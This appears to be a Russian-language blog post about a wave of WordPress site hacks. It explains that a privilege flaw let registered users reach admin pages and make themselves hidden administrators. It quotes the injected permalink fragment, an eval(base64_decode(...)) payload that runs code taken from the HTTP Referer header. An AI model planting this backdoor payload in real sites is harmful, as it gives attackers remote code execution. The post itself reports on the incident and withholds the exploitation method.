Намедни случилась большая паника среди wordpress-сообщества: злобные хакеры поломали кучу сайтов на WordPress. Вскрытие показало, что в движке чуть ли не с рождения имеется большая дыра. Удивительно, что раньше никто на это не обратил внимания. Видимо, из-за отсутствия явно выраженных признаков взлома или не столь массового характера. Проявился взлом в виде «аппендиксов» у урлов примерно такого вида: /%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Уязвимость заключается в том, что низкоуровневый юзер может получить доступ к некоторым страницам админки, на которых ему делать нечего. (Чтобы пионеры не игрались, я не буду описывать сам метод.). Хакер регистрируется, делает себя админом и хитрым образом прячется, чтобы настоящий админ его не увидел в списке пользователей. В принципе, для того, чтобы изменить схему ЧПУ, не нужно даже повышать уровень. Так что получается, что имеют место две проблемы: доступ куда не надо и левые админы.

Страницы: 1 2 3 4